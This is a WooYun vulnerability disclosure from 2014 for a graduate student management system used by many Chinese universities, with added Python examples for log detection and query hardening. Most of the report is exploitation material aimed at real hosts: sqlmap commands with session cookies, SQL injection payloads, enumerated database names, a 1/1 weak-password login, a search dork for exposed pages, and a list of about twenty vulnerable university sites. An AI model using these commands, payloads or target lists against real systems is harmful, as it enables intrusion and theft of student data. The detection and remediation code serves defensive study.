Vulnerability summary

Defect ID: wooyun-2014-056622

Title: Multiple SQL injections, weak password and information disclosure in a management system

Vendor: CNCERT (National Internet Emergency Center)

Author: Mr.leo

Submitted: 2014-04-11 11:41

Fixed: 2014-07-07 11:42

Published: 2014-07-07 11:42

Vulnerability type: SQL injection

Severity: High

Self-assessed rank: 20

Status: handed to a third-party partner (CNCERT, National Internet Emergency Center) for handling

Source: http://www.wooyun.org; for questions or help, contact [email protected]

Tags:


Vulnerability details

Disclosure status:

2014-04-11: details sent to the vendor; awaiting the vendor's handling
2014-04-16: vendor actively ignored the vulnerability; details opened to third-party security partners
2014-06-10: details opened to core white hats and experts in the relevant field
2014-06-20: details opened to regular white hats
2014-06-30: details opened to intern white hats
2014-07-07: details opened to the public

Brief description:

Multiple SQL injections, a weak password and information disclosure in a management system (the system vendor is named in the details)

Details:

The graduate student management system (gmis) made by Nanjing Nanruan Technology Co., Ltd. (南京南软科技有限公司).
First, one weak-password instance as proof: both the username and the password are 1.
http://210.41.218.62:8080/gmis/login.aspx

[screenshot: 000.jpg]

[screenshot: 128.jpg]


Injection point 1:
Run sqlmap against it. One note: since the session cookie may expire, anyone verifying this needs to capture their own cookie value and pass it to sqlmap; the reviewers should know how to do that.
The xq parameter is not filtered, which leads to injection.
sqlmap.py -u "http://210.41.218.62:8080/gmis/pygl/kbcx_jsprint.aspx?xq=19&xqmc=2013-2014春学期" -p "xq" --cookie ASP.NET_SessionId=gdg5xyfrpc5ehh450d1mez55
sqlmap identified the following injection points with a total of 75 HTTP(s) requests:
---
Place: GET
Parameter: xq
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: xq=19' AND 8883=CONVERT(INT,(CHAR(58)+CHAR(111)+CHAR(117)+CHAR(119)+CHAR(58)+(SELECT (CASE WHEN (8883=8883) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(99)+CHAR(120)+CHAR(114)+CHAR(58))) AND 'mGrS'='mGrS&xqmc=2013-2014春学期
---
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: xq
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: xq=19' AND 8883=CONVERT(INT,(CHAR(58)+CHAR(111)+CHAR(117)+CHAR(119)+CHAR(58)+(SELECT (CASE WHEN (8883=8883) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(99)+CHAR(120)+CHAR(114)+CHAR(58))) AND 'mGrS'='mGrS&xqmc=2013-2014春学期
---
current user: 'gmissa'
current database: 'Gmis31'
available databases [7]:
[*] distribution
[*] Gmis31
[*] master
[*] model
[*] msdb
[*] tempdb
[*] wznew

[screenshot: 235.jpg]


Injection point 2:
Run sqlmap against it. As above, the session cookie may expire, so verification requires capturing a fresh cookie value and passing it to sqlmap; the reviewers should know how to do that.
The xh parameter is not filtered, which leads to injection.
sqlmap.py -u "http://210.41.218.62:8080/gmis/cjgl/zqsxshView.aspx?xh=2007B031" --cookie ASP.NET_SessionId=kcnqmc55ju4polzjg4fmf055
sqlmap identified the following injection points with a total of 66 HTTP(s) requests:
---
Place: GET
Parameter: xh
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: xh=2007B031' AND 5293=5293 AND 'AMBs'='AMBs
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: xh=2007B031' AND 7187=CONVERT(INT,(CHAR(58)+CHAR(106)+CHAR(119)+CHAR(104)+CHAR(58)+(SELECT (CASE WHEN (7187=7187) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(119)+CHAR(109)+CHAR(113)+CHAR(58))) AND 'IocF'='IocF
---
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: xh
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: xh=2007B031' AND 5293=5293 AND 'AMBs'='AMBs
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: xh=2007B031' AND 7187=CONVERT(INT,(CHAR(58)+CHAR(106)+CHAR(119)+CHAR(104)+CHAR(58)+(SELECT (CASE WHEN (7187=7187) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(119)+CHAR(109)+CHAR(113)+CHAR(58))) AND 'IocF'='IocF
---
current user: 'gmissa'
current database: 'Gmis31'
available databases [7]:
[*] distribution
[*] Gmis31
[*] master
[*] model
[*] msdb
[*] tempdb
[*] wznew
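The sqlmap output for injection points 1 and 2 shows the two probe shapes a defender can look for in the web server's access log: the boolean-based pair (`' AND n=n AND 'x'='x`) and the error-based `CONVERT(INT,(CHAR(58)+...` construct used against SQL Server. The scanner below is an added example written for this page, not code from the report or from the product vendor. It parses constructed IIS W3C-style log lines (the field layout and the sample requests are assumptions built from the payloads above), URL-decodes each query parameter, and flags both the sqlmap signatures and the simpler structural anomaly of a non-numeric value arriving in a parameter that the application only ever receives as an integer (`ma` and `xq`, judging from the values on this page).

```python
import re
from urllib.parse import parse_qsl

# Parameters that the application appears to treat as integers (observed on
# the page as ma=40 and xq=19). Assumption used for the type check below.
NUMERIC_PARAMS = {"ma", "xq"}

# Signatures of the two sqlmap techniques reported in this advisory.
BOOLEAN_BLIND = re.compile(r"'\s+AND\s+(\d+)=\1\s+AND\s+'(\w+)'='\2", re.I)
ERROR_BASED = re.compile(r"CONVERT\s*\(\s*INT\s*,.*CHAR\s*\(\s*58\s*\)", re.I | re.S)

# Constructed IIS W3C-style log excerpt (not taken from the report). Query
# strings are logged URL-encoded, so spaces appear as '+' and '=' as %3D.
SAMPLE_LOG = """\
#Fields: date time cs-method cs-uri-stem cs-uri-query sc-status
2014-04-10 19:01:11 GET /gmis/leftmenu.aspx ma=40 200
2014-04-10 19:01:12 GET /gmis/leftmenu.aspx ma=40'+AND+7549%3D7549+AND+'YsIH'%3D'YsIH 200
2014-04-10 19:01:13 GET /gmis/leftmenu.aspx ma=40'+AND+6772%3DCONVERT(INT,(CHAR(58)%2BCHAR(112)%2BCHAR(58)))+AND+'jykP'%3D'jykP 500
2014-04-10 19:01:14 GET /gmis/cjgl/zqsxshView.aspx xh=2007B031 200
2014-04-10 19:01:15 GET /gmis/cjgl/zqsxshView.aspx xh=2007B031'+AND+5293%3D5293+AND+'AMBs'%3D'AMBs 200
2014-04-10 19:01:16 GET /gmis/pygl/kbcx_jsprint.aspx xq=19&xqmc=2013-2014 200
"""


def classify_value(name, value):
    """Return the list of reasons a decoded parameter value looks like an injection probe."""
    reasons = []
    if BOOLEAN_BLIND.search(value):
        reasons.append("boolean-based blind probe")
    if ERROR_BASED.search(value):
        reasons.append("error-based CONVERT/CHAR probe")
    if name.lower() in NUMERIC_PARAMS and not value.isdigit():
        reasons.append(f"non-numeric value in integer parameter {name!r}")
    return reasons


def scan_log(text):
    """Scan W3C-style log text; return one finding per request that carries a suspicious parameter."""
    findings = []
    for line_no, line in enumerate(text.splitlines(), 1):
        if not line or line.startswith("#"):
            continue  # directive lines and blanks carry no request
        fields = line.split(" ")
        if len(fields) < 6:
            continue  # malformed line; a real deployment would count these
        stem, query, status = fields[3], fields[4], fields[5]
        # parse_qsl URL-decodes each value ('+' -> space, %3D -> '=') so the
        # regexes see the payload exactly as the database would.
        for name, value in parse_qsl(query, keep_blank_values=True):
            reasons = classify_value(name, value)
            if reasons:
                findings.append({"line": line_no, "uri": stem, "param": name,
                                 "status": status, "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"line {f['line']}: {f['uri']} {f['param']} ({f['status']}) -> {', '.join(f['reasons'])}")
```

The type check is the more durable of the three signals: sqlmap's string constants change between versions and tamper scripts, but a menu id that contains a quote character is wrong regardless of what follows it. Note that the error-based request in the sample is logged with status 500, which matches how this technique works: the CONVERT of a non-numeric string throws a database error that the page surfaces.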

[screenshot: 445.jpg]


Injection point 3:
Run sqlmap against it. As above, the session cookie may expire, so verification requires capturing a fresh cookie value and passing it to sqlmap; the reviewers should know how to do that.
http://210.41.218.62:8080/gmis/tzgg/tzggdel.aspx
Two parameters in the POST data (jssj and kssj) are not filtered, which leads to injection.

[screenshot: 628.jpg]

[screenshot: 653.jpg]

[screenshot: 728.jpg]

[screenshot: 751.jpg]


Injection point 4:
One parameter in the POST data, txtbxh, is not filtered, which leads to injection.
POST http://210.41.218.62:8080/gmis/pygl/wxydbglist_dssh.aspx

[screenshot: 906.jpg]

[screenshot: 928.jpg]


Unauthorized access leading to information disclosure:
Baidu search keyword: inurl:/Gmis/xkjsb/yjsdsfc.aspx?id=

[screenshot: 025.jpg]


http://202.206.48.96:8080/gmis/xkjsb/yjsdsfc.aspx?id=0144
http://yjsy.cqmu.edu.cn:8080/gmis/xkjsb/yjsdsfc.aspx?id=100800
http://yjs.xzmc.edu.cn:8080/gmis/xkjsb/yjsdsfc.aspx?id=n0101
http://202.4.152.190:8080/gmis/xkjsb/yjsdsfc.aspx?id=2013500076

Proof of vulnerability:

Injection point in another parameter:
http://210.41.218.62:8080/gmis/leftmenu.aspx?ma=40
http://yjsg.usts.edu.cn/gmis/leftmenu.aspx?ma=40
http://211.64.205.214/gmis/leftmenu.aspx?ma=40
http://101.76.99.20/gmis/leftmenu.aspx?ma=40
http://202.194.48.107/gmis/leftmenu.aspx?ma=40
http://202.206.64.221:8080/gmis/leftmenu.aspx?ma=40
http://218.199.176.137/gmis/leftmenu.aspx?ma=40
http://yjs.htu.edu.cn/gmis/leftmenu.aspx?ma=40
http://218.195.96.52/gmis/leftmenu.aspx?ma=40
http://gims.sues.edu.cn/gmis/leftmenu.aspx?ma=40
http://yjsy1.ustb.edu.cn:8080/gmis/leftmenu.aspx?ma=40
http://gmis.swu.edu.cn:8088/gmis/leftmenu.aspx?ma=40
http://yjsxt.sta.edu.cn/gmis/leftmenu.aspx?ma=40
http://202.121.199.182:8080/gmis/leftmenu.aspx?ma=40
http://210.43.126.80:8080/gmis/leftmenu.aspx?ma=40
http://yjsjw.hzau.edu.cn/gmis/leftmenu.aspx?ma=40
http://211.71.36.110/gmis/leftmenu.aspx?ma=40
http://202.119.160.171/gmis/leftmenu.aspx?ma=40
http://101.76.160.65/gmis/leftmenu.aspx?ma=40
http://61.187.179.68:8080/gmis/leftmenu.aspx?ma=40
http://202.114.144.61/gmis/leftmenu.aspx?ma=40
http://gmis.cup.edu.cn/gmis/leftmenu.aspx?ma=40
Three instances as examples:
1. http://210.41.218.62:8080/gmis/leftmenu.aspx?ma=40
The ma parameter is injectable.
Place: GET
Parameter: ma
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: ma=40' AND 7549=7549 AND 'YsIH'='YsIH
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAV
Payload: ma=40' AND 6772=CONVERT(INT,(CHAR(58)+CHAR(112)+CHAR(117
+CHAR(58)+(SELECT (CASE WHEN (6772=6772) THEN CHAR(49) ELSE CHAR(48)
58)+CHAR(113)+CHAR(114)+CHAR(98)+CHAR(58))) AND 'jykP'='jykP
---
[19:01:11] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 1.1.4
back-end DBMS: Microsoft SQL Server 2005
[19:01:11] [INFO] fetching current user
[19:01:32] [INFO] retrieved: gmissa
current user: 'gmissa'
[19:01:32] [INFO] fetching current database
[19:01:54] [INFO] retrieved: Gmis31
current database: 'Gmis31'
[19:01:54] [INFO] fetching database names
[19:02:15] [INFO] the SQL query used returns 7 entries
[19:02:37] [INFO] retrieved: distribution
[19:02:58] [INFO] retrieved: Gmis31
[19:03:20] [INFO] retrieved: master
[19:03:42] [INFO] retrieved: model
[19:04:03] [INFO] retrieved: msdb
[19:04:25] [INFO] retrieved: tempdb
[19:04:46] [INFO] retrieved: wznew
available databases [7]:
[*] distribution
[*] Gmis31
[*] master
[*] model
[*] msdb
[*] tempdb
[*] wznew
2. http://211.64.205.214/gmis/leftmenu.aspx?ma=40

[screenshot: 604.jpg]

3. http://202.114.177.191/gmis/leftmenu.aspx?ma=40

[screenshot: 635.jpg]

Remediation:

1. Filter the parameters
2. Strengthen authentication
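The two remediation items above are what the report asks for; the example below, added for this page and not code from the report or from the product vendor, shows concretely what each amounts to for the ma parameter of leftmenu.aspx. It uses an in-memory SQLite table as a stand-in for the real SQL Server schema (the table and column names are assumptions), puts the string-concatenated query next to its parameterized replacement, and feeds both the boolean-based payload sqlmap reported for ma. It also shows the allow-list validation that should reject such a value before any query runs (the allowed patterns for ma and xh are assumptions derived from the values on this page), and a minimal password policy that would have refused the username-equals-password account used as the weak-password proof.

```python
import re
import sqlite3

# Boolean-based payload sqlmap reported for the ma parameter (from the report).
PAYLOAD = "40' AND 7549=7549 AND 'YsIH'='YsIH"

# Allow-list patterns; assumptions inferred from values seen on the page.
MA_PATTERN = re.compile(r"\d{1,6}")            # menu ids such as 40
XH_PATTERN = re.compile(r"[0-9A-Za-z]{4,12}")  # student ids such as 2007B031


def make_db():
    """Constructed stand-in for the menu table behind leftmenu.aspx (schema is assumed)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE menu (ma TEXT, title TEXT)")
    conn.executemany("INSERT INTO menu VALUES (?, ?)",
                     [("40", "Course schedule"), ("41", "Grades")])
    return conn


def lookup_unsafe(conn, ma):
    """Vulnerable pattern: the request parameter is spliced into the SQL text."""
    sql = "SELECT title FROM menu WHERE ma='" + ma + "'"
    # With PAYLOAD the statement becomes
    #   ... WHERE ma='40' AND 7549=7549 AND 'YsIH'='YsIH'
    # and the attacker-controlled condition is evaluated by the database.
    return [row[0] for row in conn.execute(sql)]


def lookup_safe(conn, ma):
    """Hardened pattern: the value is bound as a parameter and can never become SQL."""
    return [row[0] for row in conn.execute("SELECT title FROM menu WHERE ma=?", (ma,))]


def validate(name, value, pattern):
    """Allow-list check to run before the query; rejects anything outside the expected shape."""
    if not pattern.fullmatch(value):
        raise ValueError(f"rejected {name}={value!r}")
    return value


def password_acceptable(username, password, min_len=8):
    """Minimal policy: refuse trivially short passwords and ones equal to the username."""
    return len(password) >= min_len and password.lower() != username.lower()


def demo():
    """Run the tampered value through both query styles and the validator."""
    conn = make_db()
    unsafe = lookup_unsafe(conn, PAYLOAD)  # the injected condition is true, so the row comes back
    safe = lookup_safe(conn, PAYLOAD)      # no menu has that literal id, so nothing comes back
    try:
        validate("ma", PAYLOAD, MA_PATTERN)
        rejected = False
    except ValueError:
        rejected = True
    return unsafe, safe, rejected


if __name__ == "__main__":
    print(demo())
    print(password_acceptable("1", "1"))
```

The parameterized query alone closes the injection; the allow-list check is still worth keeping because it turns a malformed request into a logged rejection instead of a database error, which is exactly the signal the error-based technique above relies on.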

Copyright notice: please credit the source when reposting: Mr.leo@WooYun


Vulnerability response

Vendor response:

Severity: no impact; ignored by the vendor

Ignored on: 2014-07-07 11:42

Vendor reply:

Latest status:

2014-04-16: CNVD confirmed the report and verified the described situation on multiple instances (verification assisted by the Shanghai Jiao Tong University Network Information Center). CNCERT notified the CERNET emergency response organization of the vulnerability and copied the report to the official website mailbox of Nanruan.